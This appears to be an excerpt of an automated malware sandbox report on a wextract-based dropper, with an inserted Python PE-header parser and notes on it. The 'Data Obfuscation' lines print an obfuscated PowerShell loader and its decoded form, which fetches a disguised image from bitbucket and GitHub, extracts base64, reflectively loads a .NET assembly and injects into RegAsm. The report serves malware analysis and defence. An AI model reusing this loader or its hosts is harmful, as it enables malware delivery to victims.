                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mscoree.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: kernel.appcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.storage.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wldp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: profapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rsaenh.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptbase.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dwrite.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msvcp140_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msasn1.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msisip.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wshext.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: appxsip.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: opcservices.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: esdsip.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: userenv.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: gpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sxs.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: scrrun.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: propsys.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: linkinfo.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mswsock.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sspicli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: secur32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wbemcomn.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: amsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rstrtmgr.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncrypt.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntasn1.dll
                  Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
                  Source: Google Chrome.lnk.10.dr LNK file: ..\..\..\Program Files\Google\Chrome\Application\chrome.exe
                  Source: Window Recorder Window detected: More than 3 window changes detected
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                  Source: sRMytgfRpJ.exe Static PE information: Image base 0x140000000 > 0x60000000
                  Source: sRMytgfRpJ.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: sRMytgfRpJ.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: sRMytgfRpJ.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: sRMytgfRpJ.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: sRMytgfRpJ.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: sRMytgfRpJ.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: sRMytgfRpJ.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                  Source: sRMytgfRpJ.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: wextract.pdb source: sRMytgfRpJ.exe
                  Source: Binary string: wextract.pdbGCTL source: sRMytgfRpJ.exe
                  Source: sRMytgfRpJ.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: sRMytgfRpJ.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: sRMytgfRpJ.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: sRMytgfRpJ.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: sRMytgfRpJ.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
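The static PE records above (image base 0x140000000, the DllCharacteristics flags, the wextract.pdb debug strings) and the compile timestamp listed under Data Obfuscation further down (0xAE1BC4F8, a date in 2062) are all read straight from the PE headers. The Python below is an added example for this page, not code from the report or from the sample; it parses the DOS, COFF and optional headers with the standard library only and re-derives those values from a constructed PE32+ header built to carry the report's numbers (constructed input, not the sample's real bytes). One caveat a practitioner should apply before reading anything into the date: wextract.pdb identifies the outer file as the Windows IExpress self-extractor stub (wextract.exe), and Microsoft's reproducible builds since Windows 10 write a hash rather than a build time into TimeDateStamp, so a 2062 value is normal for that stub and is not by itself evidence of tampering. The same stub is what writes the RunOnce wextract_cleanup0 value listed under Persistence (its standard removal of the extraction directory); the payload of interest is whatever the stub extracts, here the script handed to wscript.exe.

```python
import datetime
import struct
from typing import Dict, List

# IMAGE_DLLCHARACTERISTICS_* bits from winnt.h
DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA",
    0x0040: "DYNAMIC_BASE",
    0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT",
    0x0200: "NO_ISOLATION",
    0x0400: "NO_SEH",
    0x0800: "NO_BIND",
    0x1000: "APPCONTAINER",
    0x2000: "WDM_DRIVER",
    0x4000: "GUARD_CF",
    0x8000: "TERMINAL_SERVER_AWARE",
}

# The report flags an image base above this value ("Image base 0x140000000 > 0x60000000").
IMAGE_BASE_THRESHOLD = 0x60000000

# Values taken from the static PE records in this report.
REPORT_TIMESTAMP = 0xAE1BC4F8
REPORT_IMAGE_BASE = 0x140000000
REPORT_DLL_CHARS = 0x0020 | 0x0040 | 0x0100 | 0x4000 | 0x8000


def decode_dll_characteristics(value: int) -> List[str]:
    """Expand the DllCharacteristics bitfield into the names the report prints."""
    return [name for bit, name in sorted(DLL_CHARACTERISTICS.items()) if value & bit]


def timestamp_to_utc(ts: int) -> str:
    # Add to the epoch rather than calling fromtimestamp(), so values past 2038 work on every platform.
    when = datetime.datetime(1970, 1, 1, tzinfo=datetime.timezone.utc) + datetime.timedelta(seconds=ts)
    return when.strftime("%Y-%m-%d %H:%M:%S")


def parse_pe_header(data: bytes) -> Dict[str, object]:
    """Read the fields Joe Sandbox reports from the DOS, COFF and optional headers."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    # COFF file header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics (20 bytes)
    machine, _nsections, timestamp, _, _, _opt_size, _chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x20B:      # PE32+: 64-bit ImageBase at optional header offset 24
        image_base = struct.unpack_from("<Q", data, opt + 24)[0]
    elif magic == 0x10B:    # PE32: 32-bit ImageBase at offset 28 (after BaseOfData)
        image_base = struct.unpack_from("<I", data, opt + 28)[0]
    else:
        raise ValueError(f"unknown optional header magic {magic:#x}")
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]   # same offset in PE32 and PE32+
    now = datetime.datetime.now(datetime.timezone.utc).timestamp()
    return {
        "machine": machine,
        "timestamp": timestamp,
        "timestamp_utc": timestamp_to_utc(timestamp),
        "timestamp_in_future": timestamp > now,
        "image_base": image_base,
        "image_base_flagged": image_base > IMAGE_BASE_THRESHOLD,
        "dll_characteristics": decode_dll_characteristics(dll_chars),
    }


def build_sample_header(timestamp: int, image_base: int, dll_chars: int) -> bytes:
    """Constructed minimal PE32+ header (not the sample's real bytes) so the parser runs offline."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)           # e_lfanew: PE signature right after the DOS header
    coff = struct.pack("<HHIIIHH", 0x8664, 5, timestamp, 0, 0, 240, 0x0022)
    opt = bytearray(240)                               # PE32+ optional header size
    struct.pack_into("<H", opt, 0, 0x20B)
    struct.pack_into("<Q", opt, 24, image_base)
    struct.pack_into("<H", opt, 70, dll_chars)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    import sys
    blob = (open(sys.argv[1], "rb").read() if len(sys.argv) > 1
            else build_sample_header(REPORT_TIMESTAMP, REPORT_IMAGE_BASE, REPORT_DLL_CHARS))
    for key, value in parse_pe_header(blob).items():
        shown = f"{value:#x}" if isinstance(value, int) and not isinstance(value, bool) else value
        print(f"{key}: {shown}")
```

Pass a file path to run it on a real binary; with no argument it parses the constructed header and reports the same values as the records above. For the wextract stub the useful comparison is not the date but whether the hash, size and PDB string match a known-good wextract.exe from the same Windows build.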

                  Data Obfuscation

                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: $codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#HM#a#Bp#GU#b#Bk#GE#Z#Bh#HM#LwBn#HM#Z#Bn#Gg#agBq#C8#Z#Bv#Hc#bgBs#G8#YQBk#HM#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#MQ#4#DE#MQ#3#DM#NQ#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#C##J#Bz#HQ#YQBy#
                  Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#HM#a#Bp#GU#b#Bk#GE#Z#Bh#HM#LwBn#HM#Z#Bn#Gg#agBq#C8#Z#Bv#Hc#bgBs#G8#YQBk#HM#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#MQ#4#DE#MQ#3#DM#NQ#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/shieldadas/gsdghjj/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.52liw/sdaolnwod/wqtretre/kruremlur/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
                  Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#